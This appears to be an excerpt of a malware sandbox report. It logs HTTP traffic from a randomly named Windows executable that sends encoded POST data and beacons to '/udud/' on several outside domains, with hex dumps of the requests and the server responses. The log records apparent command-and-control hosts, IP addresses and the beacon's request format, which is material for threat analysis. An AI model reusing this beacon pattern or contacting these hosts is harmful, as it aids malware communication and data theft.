                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 7a 35 48 41 4c 31 4c 56 4e 6b 42 6d 57 67 78 31 61 55 55 31 48 57 70 44 57 65 6f 33 72 4f 47 58 36 62 39 50 52 68 41 42 50 74 4f 55 47 50 36 63 33 51 4b 4d 69 36 62 30 4f 72 59 67 51 4b 34 54 73 72 63 56 4b 6a 46 50 46 66 56 77 72 46 77 64 6e 57 53 56 6c 6e 6c 68 37 67 6e 33 61 4c 43 48 37 52 64 31 70 44 49 6c 2f 78 75 58 2b 4b 55 57 45 51 4b 78 37 49 32 4b 36 75 32 48 4a 38 30 33 47 6d 72 4b 61 7a 65 39 6f 4b 37 75 7a 6b 4d 61 31 35 36 4e 69 51 74 53 37 4b 6a 50 6b 6d 71 7a 4e 71 43 46 38 42 39 79 53 70 63 2f 64 30 2f 31 57 39 6b 41 6f 49 79 61 61 49 6a 6d 44 7a 47 70 6c 4d 65 57 6a 47 44 41 59 49 65 55 46 53 53 4f 6d 56 39 35 4a 66 34 3d
                                                                                                Data Ascii: Pl9P8ldX=z5HAL1LVNkBmWgx1aUU1HWpDWeo3rOGX6b9PRhABPtOUGP6c3QKMi6b0OrYgQK4TsrcVKjFPFfVwrFwdnWSVlnlh7gn3aLCH7Rd1pDIl/xuX+KUWEQKx7I2K6u2HJ803GmrKaze9oK7uzkMa156NiQtS7KjPkmqzNqCF8B9ySpc/d0/1W9kAoIyaaIjmDzGplMeWjGDAYIeUFSSOmV95Jf4=
                                                                                                May 27, 2024 12:34:58.402158022 CEST363INHTTP/1.1 403 Forbidden
                                                                                                Date: Mon, 27 May 2024 10:34:58 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 199
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                52192.168.11.304988279.98.25.1807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:35:00.919255972 CEST1679OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.maxiwalls.com
                                                                                                Referer: http://www.maxiwalls.com/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 7a 35 48 41 4c 31 4c 56 4e 6b 42 6d 57 67 78 31 61 55 55 31 48 57 70 44 57 65 6f 33 72 4f 47 58 36 62 39 50 52 68 41 42 50 74 47 55 61 75 61 63 6c 47 43 4d 73 61 62 30 48 4c 59 6c 51 4b 34 53 73 71 34 52 4b 6a 4a 78 46 63 74 77 74 6e 34 64 68 6c 4b 56 75 6e 6c 68 6b 51 6e 36 46 37 43 6f 37 56 78 35 70 44 59 6c 2f 78 75 58 2b 4d 59 57 48 42 4b 78 6f 59 32 46 74 65 32 54 66 4d 31 53 47 6d 7a 61 61 7a 62 49 6f 61 62 75 79 45 63 61 6d 37 53 4e 74 51 74 55 34 4b 6a 70 6b 6d 6d 73 4e 71 65 4a 38 41 35 49 53 76 73 2f 4f 46 36 65 48 73 73 48 30 35 4f 33 57 38 6e 59 53 43 79 68 74 38 65 47 6b 56 2f 58 51 37 69 36 4c 6e 4b 37 31 58 42 4d 4c 72 39 68 5a 55 63 56 50 51 71 41 71 6e 37 32 51 73 67 57 4b 2b 52 73 76 4c 58 4c 61 76 36 6e 66 4d 66 43 66 35 2b 73 5a 63 2f 52 4f 54 36 56 43 43 78 47 65 61 61 51 50 58 58 67 48 41 75 43 41 55 4b 73 66 36 65 51 42 45 66 45 53 30 75 6b 68 70 6b 4b 58 44 4c 61 78 65 72 79 73 43 55 74 4d 2b 57 43 51 52 67 74 36 68 37 68 7a 63 53 33 32 67 4a 72 44 [TRUNCATED]
                                                                                                Data Ascii: Pl9P8ldX=z5HAL1LVNkBmWgx1aUU1HWpDWeo3rOGX6b9PRhABPtGUauaclGCMsab0HLYlQK4Ssq4RKjJxFctwtn4dhlKVunlhkQn6F7Co7Vx5pDYl/xuX+MYWHBKxoY2Fte2TfM1SGmzaazbIoabuyEcam7SNtQtU4KjpkmmsNqeJ8A5ISvs/OF6eHssH05O3W8nYSCyht8eGkV/XQ7i6LnK71XBMLr9hZUcVPQqAqn72QsgWK+RsvLXLav6nfMfCf5+sZc/ROT6VCCxGeaaQPXXgHAuCAUKsf6eQBEfES0ukhpkKXDLaxerysCUtM+WCQRgt6h7hzcS32gJrDwHD2j5or4ms06gjMs1UgIooI9mIgZiJJKXJRriX6/DXqLg2MurzgH7jqldXIybfs5vzanwPTf7gIpjHnvy0WcGQoQ+4o+zER1DQDBOpEHui7ZY7mhVY8UcFavs7CJll27jiI1qVOhbvnn9ZpaHmiv7sh97tOQPDvA3BS/vJ9qhZHM+tmYw0/i0DvDkEPpwDx0/vMzA17AUstzehgqtMl03mmGPbhqHCHVidhoAqsNGCFo/0aQECnWLnQS3Q5zOQhJhzPn3NteRiuS2LGTa0DjSj3iDlTw/Zx9fSOycX4WnooNvgSEpZLEl49KNldbP4GKGmiFI64q1Q+dHwKtf3/WnRRvJaYSao8kmIqv+C/l0ju322eNUPauoBj/DEcFlh1FkA81pBJzz3T71CXZ8zqHB/Y4Yl0uAKrBKd22vmZiaapqx/jRem/xULkONx5IgHIS3TkyLu0ExnUNH+6n9dh9SzB3I/SYbK5/rm/9Uc86++uhgYJ2pCwimdb1gK7CUNIkDNjooUlr1a2uceMznEJ42tzkCzrk4OwF/G8FZVf/O/2io0WctzD/hDzXoe8nOZoe59yateOEcKDCICCPs4KxzdbhS9684L4GzjEJP8ulzAgd3LubN+o0IRjeQiBjPLnB97H8GrkkXgV9cotNTUYodrdNmIFLngn27 [TRUNCATED]
                                                                                                May 27, 2024 12:35:01.127223969 CEST363INHTTP/1.1 403 Forbidden
                                                                                                Date: Mon, 27 May 2024 10:35:01 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 199
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                53192.168.11.304988379.98.25.1807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:35:03.657161951 CEST478OUTGET /udud/?Pl9P8ldX=+7vgIBjJEgFzVABnblxNZlxcXvtVnPO976cESSRxKNf7HePF9jiwkaXwYbYPT+M2gd9LCxRObe8L7kEVgXr7yG5qgAvgbam/iSwlpjMS4ArI2Mt4ChGP5d0=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:35:03.869951010 CEST1289INHTTP/1.1 200 OK
                                                                                                Date: Mon, 27 May 2024 10:35:03 GMT
                                                                                                Server: Apache
                                                                                                Cache-control: max-age=300
                                                                                                Vary: Accept-Encoding
                                                                                                Content-Length: 5662
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 38 30 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 35 63 61 33 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 69 6d 61 67 65 73 2f 74 68 75 6d 62 6e 61 69 6c [TRUNCATED]
                                                                                                Data Ascii: <!doctype html><html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex, nofollow"> <meta name="viewport" content="width=800, maximum-scale=1"> <meta name="theme-color" content="#005ca3"> <meta itemprop="image" content="https://assets.iv.lt/images/thumbnail.png"> <meta property="og:image" content="https://assets.iv.lt/images/thumbnail.png"> <link rel="icon" sizes="96x96" href="https://assets.iv.lt/images/icon.png"> <link rel="apple-touch-icon" href="https://assets.iv.lt/images/icon.png"> <link rel="stylesheet" type="text/css" href="https://assets.iv.lt/default.css"> <title>maxiwalls.com - Uregistruotas domenas - Interneto vizija</title> </head> <body>... begin header --> <table align=center cellpadding=0 cellspacing=0> <tr> <td> <iframe src="https://assets.iv.lt/header.html" width=768 height=100 scrolling=no frameborder=0></iframe> </td> </tr> <tr><td height=2 [TRUNCATED]
                                                                                                May 27, 2024 12:35:03.870037079 CEST1289INData Raw: 0a 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 37 36 38 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 30 3e 0d 0a 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 3c 74 64 3e 0d 0a
                                                                                                Data Ascii: <table width=768 align=center cellpadding=0 cellspacing=0> <tr> <td> <h1>maxiwalls.com</h1> <p> </td> </tr> <tr valign=top> <td width=508> Domenas <b>maxiwalls.com</b> skmingai uregistruotas
                                                                                                May 27, 2024 12:35:03.870170116 CEST1289INData Raw: c4 97 6d c4 97 2c 20 6b 61 64 20 c5 a1 69 61 6e 64 69 65 6e 20 70 61 73 20 6d 75 73 20 73 61 76 6f 20 69 6e 74 65 72 6e 65 74 6f 20 73 76 65 74 61 69 6e 65 73 20 74 61 6c 70 69 6e 61 20 69 72 20 6d 75 6d 69 73 20 70 61 73 69 74 69 6b 69 20 64 61
                                                                                                Data Ascii: m, kad iandien pas mus savo interneto svetaines talpina ir mumis pasitiki daugiausiai alies gyventoj. <p> <table class=table> <tr> <th></th> <th>Patui</th> <th>Svetainei</th> <th>U
                                                                                                May 27, 2024 12:35:03.870227098 CEST1289INData Raw: 20 20 3c 74 64 3e 2b 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 3c 74 64 3e 2b 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 3c 74 72 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 20 20 20 20 20 20 20 3c 74 64 20
                                                                                                Data Ascii: <td>+</td> <td>+</td> </tr> <tr align=center> <td align=left>Reseller</td> <td>-</td> <td>-</td> <td>-</td> <td>+</td> </tr> <tr align=center> <td align=left
                                                                                                May 27, 2024 12:35:03.870594025 CEST710INData Raw: 6c 69 3e 3c 61 20 74 61 72 67 65 74 3d 5f 74 6f 70 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 76 2e 6c 74 2f 70 72 6f 66 65 73 69 6f 6e 61 6c 75 73 2d 68 6f 73 74 69 6e 67 61 73 2f 22 3e 50 72 6f 66 65 73 69 6f 6e 61 6c 75 73 20
                                                                                                Data Ascii: li><a target=_top href="https://www.iv.lt/profesionalus-hostingas/">Profesionalus hostingas</a> <li><a target=_top href="https://www.iv.lt/vps-serveriai/">Serveri nuoma</a> <li><a target=_top href="https://www.iv.lt/sertifikata


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                54192.168.11.304988464.190.62.22807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:35:09.071712017 CEST766OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.donantedeovulos.space
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.donantedeovulos.space
                                                                                                Referer: http://www.donantedeovulos.space/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 65 4b 51 2b 31 52 63 59 4b 78 32 56 66 64 5a 35 54 49 48 42 67 49 6f 39 47 76 55 31 4a 55 47 70 42 48 67 6b 48 2f 4f 56 46 43 68 49 34 2f 4b 5a 4d 55 37 79 7a 63 59 55 54 51 63 38 2b 47 35 50 57 79 48 30 67 77 6f 36 62 4d 7a 46 4c 4d 73 7a 45 62 6d 73 51 30 57 34 6b 4e 6e 6a 4e 6c 58 57 2f 6d 46 4f 2b 5a 32 66 51 6b 75 2f 35 50 56 72 32 30 42 41 75 69 34 76 41 37 72 77 6d 73 61 38 6d 4f 44 49 56 51 52 33 6e 41 6d 34 6d 63 63 73 4a 71 2b 4d 47 46 39 75 6b 73 30 58 6f 5a 64 42 75 2f 4e 67 41 62 39 69 6a 30 31 68 50 5a 48 2b 4f 32 42 77 71 66 4b 73 61 75 55 37 37 47 4b 2b 69 51 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=eKQ+1RcYKx2VfdZ5TIHBgIo9GvU1JUGpBHgkH/OVFChI4/KZMU7yzcYUTQc8+G5PWyH0gwo6bMzFLMszEbmsQ0W4kNnjNlXW/mFO+Z2fQku/5PVr20BAui4vA7rwmsa8mODIVQR3nAm4mccsJq+MGF9uks0XoZdBu/NgAb9ij01hPZH+O2BwqfKsauU77GK+iQ==
                                                                                                May 27, 2024 12:35:09.261962891 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:35:09 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                55192.168.11.304988564.190.62.22807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:35:11.789696932 CEST786OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.donantedeovulos.space
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.donantedeovulos.space
                                                                                                Referer: http://www.donantedeovulos.space/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 65 4b 51 2b 31 52 63 59 4b 78 32 56 64 39 70 35 57 72 76 42 6e 6f 70 50 61 66 55 31 65 45 47 74 42 48 73 6b 48 2b 62 51 43 77 31 49 37 65 61 5a 4e 56 37 79 6d 63 59 55 62 77 63 39 7a 6d 35 51 57 79 44 38 67 79 4d 36 62 4d 33 46 4c 4a 6f 7a 46 6f 4f 72 43 55 57 2b 2f 64 6e 68 44 46 58 57 2f 6d 46 4f 2b 61 4c 77 51 6e 65 2f 35 66 6c 72 32 51 31 48 76 69 34 67 44 37 72 77 74 4d 61 34 6d 4f 44 36 56 55 4a 5a 6e 45 57 34 6d 5a 77 73 4b 37 2b 4c 50 46 39 73 72 4d 30 5a 6e 4a 56 49 33 74 67 55 52 5a 52 48 36 33 30 64 48 75 32 6b 54 31 31 79 35 2f 32 42 47 76 35 54 35 45 4c 6c 2f 61 65 72 30 7a 6a 41 52 4d 73 77 79 7a 38 75 35 37 43 78 46 67 73 3d
                                                                                                Data Ascii: Pl9P8ldX=eKQ+1RcYKx2Vd9p5WrvBnopPafU1eEGtBHskH+bQCw1I7eaZNV7ymcYUbwc9zm5QWyD8gyM6bM3FLJozFoOrCUW+/dnhDFXW/mFO+aLwQne/5flr2Q1Hvi4gD7rwtMa4mOD6VUJZnEW4mZwsK7+LPF9srM0ZnJVI3tgURZRH630dHu2kT11y5/2BGv5T5ELl/aer0zjARMswyz8u57CxFgs=
                                                                                                May 27, 2024 12:35:11.980187893 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:35:11 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                56192.168.11.304988664.190.62.22807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:35:14.510251999 CEST1703OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.donantedeovulos.space
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.donantedeovulos.space
                                                                                                Referer: http://www.donantedeovulos.space/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 65 4b 51 2b 31 52 63 59 4b 78 32 56 64 39 70 35 57 72 76 42 6e 6f 70 50 61 66 55 31 65 45 47 74 42 48 73 6b 48 2b 62 51 43 77 74 49 37 73 43 5a 4d 32 6a 79 30 73 59 55 45 41 63 34 7a 6d 35 5a 57 79 37 34 67 79 41 41 62 4f 2f 46 4b 76 55 7a 43 5a 4f 72 62 6b 57 2b 67 4e 6e 67 4e 6c 57 55 2f 6d 55 48 2b 5a 6a 77 51 6e 65 2f 35 5a 70 72 77 45 42 48 69 43 34 76 41 37 72 30 6d 73 62 64 6d 4f 62 71 56 55 46 6e 6e 31 71 34 68 39 51 73 46 70 57 4c 41 46 39 71 71 4d 31 66 6e 4a 49 51 33 74 39 76 52 61 4e 39 36 31 6b 64 43 4b 4c 2f 55 57 46 6c 39 2b 61 51 42 75 4d 6f 34 33 72 76 69 5a 50 4c 77 7a 6a 72 54 6f 6b 4e 72 54 49 53 2b 61 4c 7a 61 67 50 50 54 2f 58 7a 73 34 68 72 31 68 45 39 6d 68 66 75 67 71 70 66 30 58 64 45 41 45 51 58 61 69 31 6e 58 70 71 64 78 43 4e 4f 38 62 58 75 6b 52 5a 58 66 54 65 30 37 38 4b 64 46 32 31 52 32 52 65 69 67 59 38 63 41 35 66 51 35 35 4a 46 4d 74 34 6d 6b 32 72 4a 52 55 53 35 74 54 4e 4e 61 41 39 5a 42 59 44 58 43 7a 6b 4b 32 71 64 63 2b 6a 2f 6a 35 [TRUNCATED]
